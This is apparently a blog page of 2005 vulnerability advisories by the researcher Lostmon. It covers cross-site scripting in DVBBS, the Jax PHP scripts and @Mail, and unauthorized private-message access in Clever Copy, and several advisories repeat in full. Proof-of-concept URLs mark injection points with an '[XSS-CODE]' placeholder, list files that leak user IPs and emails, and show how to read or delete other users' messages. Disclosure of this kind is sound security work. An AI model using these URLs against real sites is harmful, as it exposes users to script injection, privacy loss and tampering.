#############################################
DVBBS Multiple variable Cross site scripting
vendor url:http://down.dvbbs.net/
SoftView/SoftView_2455.html
Advisory:http://lostmon.blogspot.com/2005/08/
dvbbs-multiple-variable-cross-site.html
vendor notify:yes exploit available:yes
OSVDB ID:18512,18679,18680
Securitytracker: 1014632
BID:14498
Secunia: SA16131
#############################################
DVBBS contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity
############
solution
############
no solution available at this time !
############
versions
############
Dvbbs 7.1 Sp2
Dvbbs 7.1
#############
timeline
#############
discovered:21-jul-2005
disclosure:21-jul-2005
public disclosure:08-ago-2005
####################
proof of concept
####################
http://[VICTIM]/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE]
http://[VICTIM]/dispuser.asp?name=Walltrapass[XSS-CODE]
http://[VICTIM]/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE]
http://[VICTIM]/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3
http://[VICTIM]/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE]
http://[VICTIM]/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title=
######################## €nd ##########################
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Jax PHP Scripts multiple vulnerabilities
Friday, August 05, 2005
############################################
Jax PHP Scripts multiple vulnerabilities
vendor url:http://www.jtr.de/scripting/php/
Advisory:http://lostmon.blogspot.com/2005/08/
jax-php-scripts-multiple.html
vendor notify:yes exploit available:yes
OSVDB ID:18568,18569,18570,18571,18572,18573,18574,18575,18576,
18577,18578,18579,18580,18581,18582,18583,18584,18585,18586,
Secunia: SA16332,SA16333,SA16337,SA16338
BID: 14481
#############################################
###########
sumary:
###########
0- Description.
1- Products affected.
2- Jax Guestbook report.
3- Jax Petitionbook report.
4- Jax Newsletter report.
5- Jax LinkLists report.
6- Jax Calendar report.
7- Jax DWT Editor report.
8- Timeline
###############
0- Description
###############
Jax scripts is a collection of usefull php scripts to added or include in a web-site.
Jax Guestbook (GPL)* ==> php script for running a WWW Guestbook
Jax Petitionbook (GPL)* ==> adaption of Jax Guestbook for running a WWW Petitionbook
Jax Newsletter (GPL)* ==> php script for running online Mailing lists / Newsletters
(Mailing List Manager)
Jax LinkLists (GPL)* ==> php script for running simple Hyperlink Lists
(Hyperlink Manager)
Jax Calendar (GPL)* ==> php script for running a simple Web Calendar
(calendar manager)
Jax DWT Editor (GPL)* ==> php script for editing html files based on Dreamweaver templates
(Template Editor)
###################
1-Products affected
###################
Jax Guestbook ==> Cross-Site Scripting and information disclosure.
Jax Petitionbook ==> Cross-Site Scripting and information disclosure.
Jax Newsletter ==> Cross-Site Scripting and information disclosure.
Jax LinkLists ==> Cross-Site Scripting and information disclosure.
Jax Calendar ==> Cross-Site Scripting.
Jax DWT Editor ==> Cross-Site Scripting.
##################
2- Jax Guestbook
##################
Cross-Site Scripting and information disclosure:
http://[victim]/guestbook/jax_guestbook.php?page=2&language=
english&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/jax_guestbook.php?page=2&language=english
[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?page=2
[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?mailto=
9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]
http://[victim]/guestbook/guestbook
// clients ip who have post a firm in guestbook
http://[victim]/guestbook/guestbook_ips2block
//list of ips banned
http://[victim]/guestbook/ips2block
//list of ips banned
http://[victim]/guestbook/formmailer/logfile.csv
// ips ,from users send via formmail.php script.
################
versions
###############
Jax Guestbook v3.1
Jax Guestbook v3.31
###################
3- Jax Petitionbook
###################
Cross-Site Scripting and information disclosure:
http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/petitionbook/shrimp_petition.php?page=3
&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/shrimp_petition.php?page=3
[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/formmailer.log
// all ip , and message what all users sent via formmail
http://[victim]/petitionbook/ips2block
//all ips banned
http://[victim]/petitionbook/petitionbook
//all ips of people have signed the petition
#################
4- Jax Newsletter
#################
Cross-Site Scripting and information disclosure:
http://[victim]/newsletter/jax_newsletter.php?language=
German[XSS-CODE]&ml_id=1
http://[victim]/newsletter/sign_in.php?do=sign_in
&language=german[XSS-CODE]&ml_id=1&ml_id=1
http://[victim]/newsletter/archive.php?
language=spanish[XSS-CODE]
http://[victim]/newsletter/logs/jnl_records
// information disclosure form users ,direct request
to this file reveals:
"email","hash","mail_format","gender","nick","mode",
"groups","action","time","ip","age","profession",
"nationality" from registered users.
############
versions
############
Jax Newsletter v2.14
Jax Newsletter v2.10
#################
5- Jax LinkLists
#################
Cross-Site Scripting and information disclosure:
http://[victim]/linklists/jax_linklists.php?
language=English[XSS-CODE]
http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]
http://[victim]/linklists/suggestions.csv
// direct request disclose ip of client who
have suggest a link.
#############
versions
#############
Jax LinkLists v1.1
Jax LinkLists v1.0
#################
6- Jax Calendar
#################
Cross-Site Scripting:
http://[victim]/calendar/jax_calendar.php?Y=2005
[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd0
9437c00badaf419eb0db5&cal_id=0&language=spanish&
gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-
%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-
+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8
[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00ba
daf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=
d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18
%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im
+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419e
b0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karls
ruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Fe
ld[XSS-CODE]
http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&
cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30
// all variables afected by XSS flaws
##############
versions
##############
Jax Calendar 1.34
Jax Calendar 1.33
#################
7- Jax DWT Editor
#################
Cross-Site Scripting:
http://[victim]/dwt_editor/dwt_editor.php?language=english
[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?language=english
&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=
%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=
german&area=textbereich2[XSS-CODE]
##############
versions
##############
Jax DWT Editor v1.0
###################
8- Timeline
###################
discovered:27-07-2005
Vendor notify:04-08-2005
vendor response:04-08-2005
disclosure:05-08-2005
#################### €nd #############################
Thnx to estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Jax PHP Scripts multiple vulnerabilities
vendor url:http://www.jtr.de/scripting/php/
Advisory:http://lostmon.blogspot.com/2005/08/
jax-php-scripts-multiple.html
vendor notify:yes exploit available:yes
OSVDB ID:18568,18569,18570,18571,18572,18573,18574,18575,18576,
18577,18578,18579,18580,18581,18582,18583,18584,18585,18586,
Secunia: SA16332,SA16333,SA16337,SA16338
BID: 14481
#############################################
###########
sumary:
###########
0- Description.
1- Products affected.
2- Jax Guestbook report.
3- Jax Petitionbook report.
4- Jax Newsletter report.
5- Jax LinkLists report.
6- Jax Calendar report.
7- Jax DWT Editor report.
8- Timeline
###############
0- Description
###############
Jax scripts is a collection of usefull php scripts to added or include in a web-site.
Jax Guestbook (GPL)* ==> php script for running a WWW Guestbook
Jax Petitionbook (GPL)* ==> adaption of Jax Guestbook for running a WWW Petitionbook
Jax Newsletter (GPL)* ==> php script for running online Mailing lists / Newsletters
(Mailing List Manager)
Jax LinkLists (GPL)* ==> php script for running simple Hyperlink Lists
(Hyperlink Manager)
Jax Calendar (GPL)* ==> php script for running a simple Web Calendar
(calendar manager)
Jax DWT Editor (GPL)* ==> php script for editing html files based on Dreamweaver templates
(Template Editor)
###################
1-Products affected
###################
Jax Guestbook ==> Cross-Site Scripting and information disclosure.
Jax Petitionbook ==> Cross-Site Scripting and information disclosure.
Jax Newsletter ==> Cross-Site Scripting and information disclosure.
Jax LinkLists ==> Cross-Site Scripting and information disclosure.
Jax Calendar ==> Cross-Site Scripting.
Jax DWT Editor ==> Cross-Site Scripting.
##################
2- Jax Guestbook
##################
Cross-Site Scripting and information disclosure:
http://[victim]/guestbook/jax_guestbook.php?page=2&language=
english&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/jax_guestbook.php?page=2&language=english
[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?page=2
[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?mailto=
9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]
http://[victim]/guestbook/guestbook
// clients ip who have post a firm in guestbook
http://[victim]/guestbook/guestbook_ips2block
//list of ips banned
http://[victim]/guestbook/ips2block
//list of ips banned
http://[victim]/guestbook/formmailer/logfile.csv
// ips ,from users send via formmail.php script.
################
versions
###############
Jax Guestbook v3.1
Jax Guestbook v3.31
###################
3- Jax Petitionbook
###################
Cross-Site Scripting and information disclosure:
http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/petitionbook/shrimp_petition.php?page=3
&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/shrimp_petition.php?page=3
[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/formmailer.log
// all ip , and message what all users sent via formmail
http://[victim]/petitionbook/ips2block
//all ips banned
http://[victim]/petitionbook/petitionbook
//all ips of people have signed the petition
#################
4- Jax Newsletter
#################
Cross-Site Scripting and information disclosure:
http://[victim]/newsletter/jax_newsletter.php?language=
German[XSS-CODE]&ml_id=1
http://[victim]/newsletter/sign_in.php?do=sign_in
&language=german[XSS-CODE]&ml_id=1&ml_id=1
http://[victim]/newsletter/archive.php?
language=spanish[XSS-CODE]
http://[victim]/newsletter/logs/jnl_records
// information disclosure form users ,direct request
to this file reveals:
"email","hash","mail_format","gender","nick","mode",
"groups","action","time","ip","age","profession",
"nationality" from registered users.
############
versions
############
Jax Newsletter v2.14
Jax Newsletter v2.10
#################
5- Jax LinkLists
#################
Cross-Site Scripting and information disclosure:
http://[victim]/linklists/jax_linklists.php?
language=English[XSS-CODE]
http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]
http://[victim]/linklists/suggestions.csv
// direct request disclose ip of client who
have suggest a link.
#############
versions
#############
Jax LinkLists v1.1
Jax LinkLists v1.0
#################
6- Jax Calendar
#################
Cross-Site Scripting:
http://[victim]/calendar/jax_calendar.php?Y=2005
[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd0
9437c00badaf419eb0db5&cal_id=0&language=spanish&
gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-
%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-
+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8
[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00ba
daf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=
d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18
%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im
+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419e
b0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karls
ruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Fe
ld[XSS-CODE]
http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&
cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30
// all variables afected by XSS flaws
##############
versions
##############
Jax Calendar 1.34
Jax Calendar 1.33
#################
7- Jax DWT Editor
#################
Cross-Site Scripting:
http://[victim]/dwt_editor/dwt_editor.php?language=english
[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?language=english
&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=
%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=
german&area=textbereich2[XSS-CODE]
##############
versions
##############
Jax DWT Editor v1.0
###################
8- Timeline
###################
discovered:27-07-2005
Vendor notify:04-08-2005
vendor response:04-08-2005
disclosure:05-08-2005
#################### €nd #############################
Thnx to estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
@Mail multiple variable cross-site scripting
Thursday, July 28, 2005
#############################################
@Mail multiple variable cross-site scripting
vendor url:http://www.atmail.com
Advisory:http://lostmon.blogspot.com/2005/07/
mail-multiple-variable-cross-site.html
vendor notify:yes exploit available: yes
OSVDB ID:18337,18338,18339,18340
Secunia: SA16252
BID: 14408
##############################################
@Mail is a feature rich Email solution that allows users to access
email-resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s)
@Mail contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
#############
versions
#############
@Mail 4.03 WebMail for Windows
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /
it is also posible other versions are vulnerable.
#################
solution
#################
Apply patch for version 4.11.
http://calacode.com/patch.pl
#################
Timeline
#################
Discovered:02-07-2005
vendor notify:27-07-2005
vendor response:28-07-2005
disclosure:28-07-2005
##################
Proof of comcepts
##################
For exploit this flaws, need a client login and for exploiting
all flaws in /webadmin/ need a admin login.
###################
princal.pl
###################
http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4
http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]
http://[victim]/printcal.pl?type=4[XSS-CODE]
###################
task.pl
###################
http://[victim]/task.pl?func=todo[XSS-CODE]
###################
compose.pl
####################
http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.
[victim].com%3A2%2C&folder=Sent&cache=&func=reply
&type=reply[XSS-CODE]
http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]
http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r
http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=&Bcc=[XSS-CODE]
http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=[XSS-CODE]&Bcc=
http://[victim]/compose.pl?func=new&To=
lala@lala.es[XSS-CODE]&Cc=&Bcc=
###################
webadmin/filter.pl
###################
http://[victim]/webadmin/filter.pl?func=
viewmailrelay&Order=IPaddress[XSS-CODE]
http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from&Type=1[XSS-CODE]&View=1
http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from[XSS-CODE]&Type=1&View=1
http://[victim]/webadmin/filter.pl?
func=filter&Header=whitelist_from&Type=0&Display=1
&Sort=value[XSS-CODE]&Type=1&View=1
######################## €nd ##########################
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
@Mail multiple variable cross-site scripting
vendor url:http://www.atmail.com
Advisory:http://lostmon.blogspot.com/2005/07/
mail-multiple-variable-cross-site.html
vendor notify:yes exploit available: yes
OSVDB ID:18337,18338,18339,18340
Secunia: SA16252
BID: 14408
##############################################
@Mail is a feature rich Email solution that allows users to access
email-resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s)
@Mail contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
#############
versions
#############
@Mail 4.03 WebMail for Windows
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /
it is also posible other versions are vulnerable.
#################
solution
#################
Apply patch for version 4.11.
http://calacode.com/patch.pl
#################
Timeline
#################
Discovered:02-07-2005
vendor notify:27-07-2005
vendor response:28-07-2005
disclosure:28-07-2005
##################
Proof of comcepts
##################
For exploit this flaws, need a client login and for exploiting
all flaws in /webadmin/ need a admin login.
###################
princal.pl
###################
http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4
http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]
http://[victim]/printcal.pl?type=4[XSS-CODE]
###################
task.pl
###################
http://[victim]/task.pl?func=todo[XSS-CODE]
###################
compose.pl
####################
http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.
[victim].com%3A2%2C&folder=Sent&cache=&func=reply
&type=reply[XSS-CODE]
http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]
http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r
http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=&Bcc=[XSS-CODE]
http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=[XSS-CODE]&Bcc=
http://[victim]/compose.pl?func=new&To=
lala@lala.es[XSS-CODE]&Cc=&Bcc=
###################
webadmin/filter.pl
###################
http://[victim]/webadmin/filter.pl?func=
viewmailrelay&Order=IPaddress[XSS-CODE]
http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from&Type=1[XSS-CODE]&View=1
http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from[XSS-CODE]&Type=1&View=1
http://[victim]/webadmin/filter.pl?
func=filter&Header=whitelist_from&Type=0&Display=1
&Sort=value[XSS-CODE]&Type=1&View=1
######################## €nd ##########################
Thnx to estrella to be my ligth
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Clever Copy Unauthorized read & delete Private Messages
Wednesday, July 27, 2005
################################################
Clever Copy Unauthorized read & delete Private Messages
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-unauthorized-read-delete.html
vendor notify: yes exploit available:yes
OSVDB ID: 18509
Secunia : SA16236
BID:14397
################################################
Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System
Clever Copy contains a flaw that allows a Unauthorized read & delete Private Messages from other users.
The flaw is done wen a authenticated user try to access directly to a
especial url to gain unauthorized access to private messages.
############
versions
############
Clever Copy 2.0
Clever Copy 2.0a
###############
Solution
###############
No solution at this time !!
###################
Timeline
###################
Discovered: 25-07-2005
Vendor notify:26-07-2005
Disclosure:27-07-2005
###################
proof of concept
###################
First we must be logged for have access to private messages
and go to this url:
http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass
or
http://[victim]/readpm.php?op=read&ID=2&user=waltrapass
and we look the message 2 from waltrapass user :)
op= read or del
id= id from message what we like to look
name= username of user was send the private message
( this is not necessary to view or delete a message)
user= username from user what we try to look their PM
for delete a message we can go to similar url:
http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass
or
http://[victim]/readpm.php?op=del&ID=2&user=waltrapass
##################### €nd #############################
thnxs to estrella to be my ligth
thnxs to http://www.osvdb.org/
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Clever Copy Unauthorized read & delete Private Messages
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-unauthorized-read-delete.html
vendor notify: yes exploit available:yes
OSVDB ID: 18509
Secunia : SA16236
BID:14397
################################################
Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System
Clever Copy contains a flaw that allows a Unauthorized read & delete Private Messages from other users.
The flaw is done wen a authenticated user try to access directly to a
especial url to gain unauthorized access to private messages.
############
versions
############
Clever Copy 2.0
Clever Copy 2.0a
###############
Solution
###############
No solution at this time !!
###################
Timeline
###################
Discovered: 25-07-2005
Vendor notify:26-07-2005
Disclosure:27-07-2005
###################
proof of concept
###################
First we must be logged for have access to private messages
and go to this url:
http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass
or
http://[victim]/readpm.php?op=read&ID=2&user=waltrapass
and we look the message 2 from waltrapass user :)
op= read or del
id= id from message what we like to look
name= username of user was send the private message
( this is not necessary to view or delete a message)
user= username from user what we try to look their PM
for delete a message we can go to similar url:
http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass
or
http://[victim]/readpm.php?op=del&ID=2&user=waltrapass
##################### €nd #############################
thnxs to estrella to be my ligth
thnxs to http://www.osvdb.org/
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)